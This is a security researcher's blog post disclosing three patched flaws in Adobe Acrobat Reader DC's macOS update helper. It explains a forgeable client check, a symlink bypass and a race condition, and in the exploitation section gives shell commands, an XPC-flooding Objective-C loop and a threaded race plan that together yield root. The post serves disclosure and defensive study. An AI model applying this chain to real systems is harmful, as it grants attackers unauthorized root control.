<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-145401438-1', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->


  
  <title>Security Flaws in Adobe Acrobat Reader Allow Malicious Program to Gain Root on macOS Silently | Yuebin Sun&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Yuebin Sun(@yuebinsun2020) of Tencent Security Xuanwu Lab 0x0 SummaryToday, Adobe Acrobat Reader DC for macOS patched three critical vulnerabilities(CVE-2020-9615, CVE-2020-9614, CVE-2020-9613) I repo">
<meta property="og:type" content="article">
<meta property="og:title" content="Security Flaws in Adobe Acrobat Reader Allow Malicious Program to Gain Root on macOS Silently">
<meta property="og:url" content="https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/index.html">
<meta property="og:site_name" content="Yuebin Sun&#39;s Blog">
<meta property="og:description" content="Yuebin Sun(@yuebinsun2020) of Tencent Security Xuanwu Lab 0x0 SummaryToday, Adobe Acrobat Reader DC for macOS patched three critical vulnerabilities(CVE-2020-9615, CVE-2020-9614, CVE-2020-9613) I repo">
<meta property="og:locale">
<meta property="og:image" content="https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/find_ARMDCHammer.png">
<meta property="og:image" content="https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/ARMDCHammer_zip_contents.png">
<meta property="og:image" content="https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/exploit-demo-jietu-HD-2.gif">
<meta property="article:published_time" content="2020-05-14T09:32:39.000Z">
<meta property="article:modified_time" content="2020-09-26T14:14:50.757Z">
<meta property="article:author" content="Yuebin Sun">
<meta property="article:tag" content="macOS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/find_ARMDCHammer.png">
<meta name="twitter:creator" content="@yuebinsun2020">
  
    <link rel="alternate" href="/atom.xml" title="Yuebin Sun&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Yuebin Sun&#39;s Blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
          <a class="main-nav-link" href="/about">About</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://rekken.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/" class="article-date">
  <time datetime="2020-05-14T09:32:39.000Z" itemprop="datePublished">2020-05-14</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Security Flaws in Adobe Acrobat Reader Allow Malicious Program to Gain Root on macOS Silently
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>Yuebin Sun(<a target="_blank" rel="noopener" href="https://twitter.com/yuebinsun2020">@yuebinsun2020</a>) of Tencent Security Xuanwu Lab</p>
<h2 id="0x0-Summary"><a href="#0x0-Summary" class="headerlink" title="0x0 Summary"></a>0x0 Summary</h2><p>Today, Adobe Acrobat Reader DC for macOS patched three critical vulnerabilities(CVE-2020-9615, CVE-2020-9614, CVE-2020-9613) I reported. The only requirement needed to trigger the vulnerabilities is that Adobe Acrobat Reader DC has been installed. A normal user on macOS(with SIP enabled) can locally exploit this vulnerabilities chain to elevate privilege to the ROOT without a user being aware. In this blog, I will analyze the details of vulnerabilities and show how to exploit them.</p>
<h2 id="0x1-Background"><a href="#0x1-Background" class="headerlink" title="0x1 Background"></a>0x1 Background</h2><p>The root process has superpowers, it almost can do anything, reading/writing all sensitive files/databases such as Images/Calendars. However in modern macOS, root processes outside of sandbox are rare, most macOS built-in services run within a sandbox. They are no longer the king, they imprison themselves in a cage based on declarative sandbox profile rules. </p>
<p>Good news, popular software with high privileged services are new good target in addition to macOS built-in services, so Adobe Acrobat Reader DC catch my attention.</p>
<a id="more"></a>

<h2 id="0x2-Analysis"><a href="#0x2-Analysis" class="headerlink" title="0x2 Analysis"></a>0x2 Analysis</h2><p>com.adobe.ARMDC.SMJobBlessHelper within /Library/PrivilegedHelperTools/ is one of the components of Adobe Acrobat Reader DC, responsible for software updating. It runs as root and no-sandbox are applied, and hosts an XPC service named SMJobBlessHelper(com.adobe.ARMDC.SMJobBlessHelper). Most XPC services will check its connection client before doing any actual work, so does SMJobBlessHelper.</p>
<h3 id="Vulnerability-1-Bad-Checking-of-NSXPC-Connection-Client"><a href="#Vulnerability-1-Bad-Checking-of-NSXPC-Connection-Client" class="headerlink" title="Vulnerability 1: Bad Checking of NSXPC Connection Client"></a>Vulnerability 1: Bad Checking of NSXPC Connection Client</h3><p>SMJobBlessHelper is based on NSXPC, its client checking exists in [SMJobBlessHelper listener:shouldAcceptNewConnection:]. The checking logic is as pseudo-code shows below, gets the client’s PID, and then obtains Bundle ID based on the client’s process path, the client will be trusted if its Bundle ID is “com.adobe.ARMDC”.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pid &#x3D; [NSXPCConnection processIdentifier];</span><br><span class="line">proc_pidpath(v7, proc_path, 0x1000u);</span><br><span class="line">bundle &#x3D; [NSBundle bundleWithPath:proc_path];</span><br><span class="line">bd_id &#x3D; [bundle bundleIdentifier];</span><br><span class="line"></span><br><span class="line">if (bd_id &#x3D;&#x3D; &quot;com.adobe.ARMDC&quot;)&#123;</span><br><span class="line">    &#x2F;&#x2F; Accept client&#39;s XPC connection request</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>But what is NSBundle, can we trust it?</p>
<p>Apple says it is “A representation of the code and resources stored in a bundle directory on disk.”, so it’s just a directory structure with some well-defined subdirectories/files. The bundle ID is obtained from Contents/Info.plist of the directory structure. </p>
<p>The directory structure is certainly not credible, we can forge any Bundle ID by creating our special bundle directory.</p>
<h3 id="Vulnerability-2-Temp-Directory-Root-Protection-Can-Be-Bypassed"><a href="#Vulnerability-2-Temp-Directory-Root-Protection-Can-Be-Bypassed" class="headerlink" title="Vulnerability 2: Temp Directory Root Protection Can Be Bypassed"></a>Vulnerability 2: Temp Directory Root Protection Can Be Bypassed</h3><p>As the pseudo below show, in the updating process before SMJobBlessHelper launch ARMDCHammer, download folder(in bundle’s parent directory) will be moved to /var/folders/zz/xxxxx/T/. Unfortunately after directory moving, the owner of “/var/folders/zz/xxxxx_n0000000000000/T/download” is the root, and normal user DO NOT have access to it. So it means that we can not change it and its subfiles any more.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">move(&quot;.&#x2F;download&quot;, &quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&quot;);</span><br><span class="line"></span><br><span class="line">if (validateBinary(&quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&#x2F;ARMDCHammer&quot;))&#123;</span><br><span class="line">	launch(&quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&#x2F;ARMDCHammer&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>But, the designer may forget the symlink. </p>
<p>If ./download/ARMDCHammer is a symlink, after being moved to /var/folders/zz/xxxxx/T/download, does the symlink still be valid?</p>
<p>Yes, the symlink is still valid, it can help us to bypass temp directory protection. I can force /var/folders/zz/xxxxx/T/download/ARMDCHammer to link to anywhere.</p>
<h3 id="Vulnerability-3-validateBinary-and-launchARMHammer-Has-a-Race-Condition-window"><a href="#Vulnerability-3-validateBinary-and-launchARMHammer-Has-a-Race-Condition-window" class="headerlink" title="Vulnerability 3: validateBinary and launchARMHammer Has a Race Condition window"></a>Vulnerability 3: validateBinary and launchARMHammer Has a Race Condition window</h3><p>With the help of vulnerability 2, we can force validateBinary() to check /tmp/test/hello_root.</p>
<p>The logic exists in [SMJobBlessHelper doWork].</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if (validateBinary(&quot;&#x2F;tmp&#x2F;test&#x2F;hello_root&quot;))&#123;</span><br><span class="line">    launchARMHammer(&quot;&#x2F;tmp&#x2F;test&#x2F;hello_root&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>validateBinary and launchARMHammer all use program path, and we have writing permission to this path.</p>
<p>So if we can replace the “/tmp/test/hello_root” with our malicious file after validateBinary, launchARMHammer will launch our malicious process.</p>
<p>You may think the race condition window is too narrow to control, I will show the tricks later.</p>
<h2 id="0x3-Exploitation"><a href="#0x3-Exploitation" class="headerlink" title="0x3 Exploitation"></a>0x3 Exploitation</h2><h3 id="Bypass-Checking-of-NSXPC-Connection-Client"><a href="#Bypass-Checking-of-NSXPC-Connection-Client" class="headerlink" title="Bypass Checking of NSXPC Connection Client"></a>Bypass Checking of NSXPC Connection Client</h3><p>As explained before, NSBundle is not trusted, so we try to forge an NSBundle, with its bundle id is “com.adobe.ARMDC”. For saving time, we copy Adobe’s original bundle from “/Library/Application Support/Adobe/ARMDC/Application/Adobe Acrobat Updater.app”.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;copy Adobe Acrobat Updater.app&quot;</span></span><br><span class="line"></span><br><span class="line">cp -r <span class="string">&quot;/Library/Application Support/Adobe/ARMDC/Application/Adobe Acrobat Updater.app&quot;</span> /tmp/<span class="built_in">test</span>/exploit</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<p>Then compile our NSXPC Exploit client, copy it to Adobe Acrobat Updater.app/Contents/MacOS/</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /tmp/<span class="built_in">test</span>/exploit</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;compiling SMJobBlessHelper-Exploit&quot;</span></span><br><span class="line">clang -framework Foundation SMJobBlessHelper-Exploit.m -o SMJobBlessHelper-Exploit</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;move SMJobBlessHelper-Exploit to Adobe Acrobat Updater.app&quot;</span></span><br><span class="line">mkdir <span class="string">&quot;Adobe Acrobat Updater.app/Contents/MacOS&quot;</span></span><br><span class="line">mv SMJobBlessHelper-Exploit <span class="string">&quot;Adobe Acrobat Updater.app/Contents/MacOS/&quot;</span></span><br></pre></td></tr></table></figure>

<p>Now, SMJobBlessHelper-Exploit, being launched as an NSXPC client, will pass through [SMJobBlessHelper listener:shouldAcceptNewConnection:]’s check.</p>
<h3 id="Bypass-Temp-Directory-Root-Protection"><a href="#Bypass-Temp-Directory-Root-Protection" class="headerlink" title="Bypass Temp Directory Root Protection"></a>Bypass Temp Directory Root Protection</h3><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">DoWorkAndLauchHammer()&#123;</span><br><span class="line">    <span class="built_in">move</span>(<span class="string">&quot;./download&quot;</span>, <span class="string">&quot;/var/folders/zz/xxxxx/T/download&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (validateBinary(<span class="string">&quot;/var/folders/zz/xxxxx/T/download/ARMDCHammer&quot;</span>))&#123;</span><br><span class="line">        launch(<span class="string">&quot;/var/folders/zz/xxxxx/T/download/ARMDCHammer&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Symlink can help us, before SMJobBlessHelper moves our download directory, we create a symlink at our download directory.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> /tmp/<span class="built_in">test</span></span><br><span class="line">$ mkdir download</span><br><span class="line">$ ln -s /tmp/<span class="built_in">test</span>/hello_root ./download/ARMDCHammer</span><br><span class="line">$ ls -l download/</span><br><span class="line">total 0</span><br><span class="line">lrwxr-xr-x  1 rekken  staff  72  4 12 16:04 ARMDCHammer -&gt; /tmp/<span class="built_in">test</span>/hello_root</span><br></pre></td></tr></table></figure>

<p>Then we trigger SMJobBlessHelper’s XPC interface, /tmp/test/exploit/download is moved to /var/folders/zz/xxxxx/T/download.</p>
<p>Now, we can see symlink in /tmp/test/exploit/download/ is still pointing to /tmp/test/hello_root.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ sudo ls -l /var/folders/zz/xxxxx/T/download</span><br><span class="line">total 0</span><br><span class="line">lrwxr-xr-x  1 rekken  staff  72  4 12 16:04 ARMDCHammer -&gt; /tmp/<span class="built_in">test</span>/hello_root</span><br></pre></td></tr></table></figure>

<p>So, with the help of symlink we change checking logic:</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">DoWorkAndLauchHammer()&#123;</span><br><span class="line">    <span class="built_in">move</span>(<span class="string">&quot;./download&quot;</span>, <span class="string">&quot;/var/folders/zz/xxxxx/T/download&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (validateBinary(<span class="string">&quot;/tmp/test/hello_root&quot;</span>))&#123;</span><br><span class="line">        launch(<span class="string">&quot;/tmp/test/hello_root&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<h3 id="Find-a-Valid-ARMDCHammer-to-Meet-validateBinary’s-Requirement"><a href="#Find-a-Valid-ARMDCHammer-to-Meet-validateBinary’s-Requirement" class="headerlink" title="Find a Valid ARMDCHammer to Meet validateBinary’s Requirement"></a>Find a Valid ARMDCHammer to Meet validateBinary’s Requirement</h3><p>validateBinary use built-in codesign command to check if /var/folders/zz/xxxxx/T/download/ARMDCHammer is valid or not.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">validateBinary(&quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&#x2F;ARMDCHammer&quot;);</span><br></pre></td></tr></table></figure>

<p>The parameters passed to codesign are as below:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">(lldb) po <span class="variable">$rcx</span></span><br><span class="line">(</span><br><span class="line">    <span class="string">&quot;--verify&quot;</span>,</span><br><span class="line">    <span class="string">&quot;-R=identifier ARMDCHammer and anchor trusted and anchor apple generic and certificate leaf[subject.CN] = \&quot;Developer ID Application: Adobe Systems, Inc. (JQ525L2MZD)\&quot;&quot;</span>,</span><br><span class="line">    <span class="string">&quot;/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/T/download/ARMDCHammer&quot;</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>Where can we find the valid ARMDCHammer?</p>
<p>I write a script, which searches the full local disk for ARMDCHammer, and finally gain nothing. But it must exist, isn’t it?</p>
<p>Since it is not on the local drive, it should have been downloaded on demand. I reverse a lot of binary files and found the cute download URL in Acrobat Update Helper.app. Downloading and extracting the archive, in the end, I catch the ARMDCHammer I’m looking for.</p>
<p><img src="find_ARMDCHammer.png" alt="find_ARMDCHammer_url"></p>
<p><img src="ARMDCHammer_zip_contents.png" alt="ARMDCHammer_zip"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ codesign --verbose --verify -R=<span class="string">&quot;identifier ARMDCHammer and anchor trusted and anchor apple generic and certificate leaf[subject.CN] = \&quot;Developer ID Application: Adobe Systems, Inc. (JQ525L2MZD)\&quot;&quot;</span> ~/Downloads/ARMDCContents2/ASSET/Contents/MacOS/ARMDCHammer</span><br><span class="line"></span><br><span class="line">/Users/rekken/Downloads/ARMDCContents2/ASSET/Contents/MacOS/ARMDCHammer: valid on disk</span><br><span class="line">/Users/rekken/Downloads/ARMDCContents2/ASSET/Contents/MacOS/ARMDCHammer: satisfies its Designated Requirement</span><br><span class="line">/Users/rekken/Downloads/ARMDCContents2/ASSET/Contents/MacOS/ARMDCHammer: explicit requirement satisfied</span><br></pre></td></tr></table></figure>



<h3 id="Race-Condition-Between-validateBinary-and-launchARMHammer"><a href="#Race-Condition-Between-validateBinary-and-launchARMHammer" class="headerlink" title="Race Condition Between validateBinary and launchARMHammer"></a>Race Condition Between validateBinary and launchARMHammer</h3><p>The time window between validateBinary and launchARMHammer is narrow. OPLock can help us to freeze time in Windows, unfortunately, there are no alternatives like that in macOS.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">DoWorkAndLauchHammer()&#123;</span><br><span class="line">    move(&quot;.&#x2F;download&quot;, &quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&quot;);</span><br><span class="line"></span><br><span class="line">    if (validateBinary(&quot;&#x2F;tmp&#x2F;test&#x2F;hello_root&quot;))&#123;</span><br><span class="line">        launch(&quot;&#x2F;tmp&#x2F;test&#x2F;hello_root&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>We split our works into three parts, each part uses a separate thread.</p>
<p>Thread 1: Circularly replace files frequently</p>
<p>Symlink in /var/folders/zz/xxxxx/T/download point to /tmp/test/hello_root, so we replace it circularly.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Step 1: move &#x2F;tmp&#x2F;test&#x2F;ARMDCHammer to &#x2F;tmp&#x2F;test&#x2F;hello_root，</span><br><span class="line">Step 2: sleep</span><br><span class="line">Step 3: move &#x2F;tmp&#x2F;test&#x2F;hello_root to &#x2F;tmp&#x2F;test&#x2F;ARMDCHammer</span><br><span class="line">Step 4: sleep and goto Step 1</span><br></pre></td></tr></table></figure>

<p>Thread 2: Prepare download directory and symlink frequently</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Step 1: create &#x2F;tmp&#x2F;test&#x2F;orig_download directory, create symlink &#x2F;tmp&#x2F;test&#x2F;orig_download&#x2F;ARMDCHammer pointing to &#x2F;tmp&#x2F;test&#x2F;hello_root</span><br><span class="line"></span><br><span class="line">Step 2: copy &#x2F;tmp&#x2F;test&#x2F;orig_download to &#x2F;tmp&#x2F;test&#x2F;download</span><br><span class="line"></span><br><span class="line">Step 3: sleep</span><br><span class="line"></span><br><span class="line">Step 4: goto Step 2 when &#x2F;tmp&#x2F;test&#x2F;download disapears</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<p>Thread 3: Trigger NSXPC DoWorkAndLauchHammer interface</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">while(1)&#123;</span><br><span class="line">    NSXPCConnection * connectionToService &#x3D; [[NSXPCConnection alloc] initWithMachServiceName:@&quot;com.adobe.ARMDC.SMJobBlessHelper&quot; options: 0];</span><br><span class="line">    connectionToService.remoteObjectInterface &#x3D; [NSXPCInterface interfaceWithProtocol:@protocol(SMJobBlessHelperProtocol)];</span><br><span class="line">    [connectionToService resume];</span><br><span class="line"></span><br><span class="line">    id remote &#x3D; [connectionToService remoteObjectProxyWithErrorHandler:^(NSError *proxyError) &#123;</span><br><span class="line">        NSLog(@&quot;error: %@&quot;, proxyError);</span><br><span class="line">    &#125;];</span><br><span class="line">    [remote DoWorkAndLauchHammer: ^(_Bool retcode) &#123;</span><br><span class="line">        &#x2F;&#x2F;</span><br><span class="line">    &#125;];</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The reason we need Thread 1 is obvious, why we need separate Thread 2 and Thread 3?</p>
<p>High-frequency NSXPC interface call requests which make the server busy can increase the probability of success. With multi-threads running, the race condition needs a very short time. In my test, most test cases need only 1~3 seconds, and the best case only takes a blink of time.</p>
<h2 id="0x4-Demo"><a href="#0x4-Demo" class="headerlink" title="0x4 Demo"></a>0x4 Demo</h2><p>(Safari may not play the gif automatically, recommend to use Chrome or Firefox)</p>
<p><img src="exploit-demo-jietu-HD-2.gif" alt="demo"></p>
<h2 id="0x5-Patch"><a href="#0x5-Patch" class="headerlink" title="0x5 Patch"></a>0x5 Patch</h2><p>The most important part of the vulnerability patch is adding a new function named -[SMJobBlessHelper validatePaths], before validateBinary and launch, it checks the path is a symlink or not. It breaks the only way which must be passed.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">bool -[SMJobBlessHelper validatePaths](path)&#123;</span><br><span class="line">    if(fileIsSymbolicLink(path))&#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">    return true</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">DoWorkAndLauchHammer()&#123;</span><br><span class="line">    move(&quot;.&#x2F;download&quot;, &quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&quot;);</span><br><span class="line"></span><br><span class="line">    if(validatePaths(&quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&quot;))&#123;</span><br><span class="line">        if (validateBinary(&quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&quot;))&#123;</span><br><span class="line">            launch(&quot;&#x2F;var&#x2F;folders&#x2F;zz&#x2F;xxxxx&#x2F;T&#x2F;download&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x6-Conclusion"><a href="#0x6-Conclusion" class="headerlink" title="0x6 Conclusion"></a>0x6 Conclusion</h2><p>In this blog, I analyzed the three logic vulnerabilities in Adobe Acrobat Reader and show how to exploit them to gain root without sandbox limitation. As an almost per-device required software, its security matters to macOS.</p>
<p>Ping me(<a target="_blank" rel="noopener" href="https://twitter.com/yuebinsun2020">@yuebinsun2020</a>) if you have any questions.</p>
<p>Thanks to R3dF09(<a target="_blank" rel="noopener" href="https://twitter.com/R3dF09">@R3dF09</a>) for help in the analysis.</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/" data-id="cker5305900049frk2ig3g1jr" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/macOS/" rel="tag">macOS</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2020/02/26/macOS-Security-Framework-and-Previous-CVEs-EN/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">macOS Security Framework and previous CVEs</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/macOS/" rel="tag">macOS</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/macOS/" style="font-size: 10px;">macOS</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">March 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/07/">July 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/05/">May 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/01/">January 2017</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/">Security Flaws in Adobe Acrobat Reader Allow Malicious Program to Gain Root on macOS Silently</a>
          </li>
        
          <li>
            <a href="/2020/02/26/macOS-Security-Framework-and-Previous-CVEs-EN/">macOS Security Framework and previous CVEs</a>
          </li>
        
          <li>
            <a href="/2020/02/26/macOS-Security-Framework-and-Previous-CVEs-CN/">macOS Security Framework and previous CVEs</a>
          </li>
        
          <li>
            <a href="/2019/03/31/Analysis-of-Microsoft-Edge-Chakra-OP-NewScObjArray-Type-Confusion-Vulnerability/">Microsoft Edge Chakra OP_NewScObjArray 类型混淆漏洞分析笔记</a>
          </li>
        
          <li>
            <a href="/2017/07/23/Analysis-and-Exploitation-of-GeekPwn-2016-Windows-Services-EoP-Vulnerability/">GeekPwn 2016 Windows 服务提权漏洞的分析和利用</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
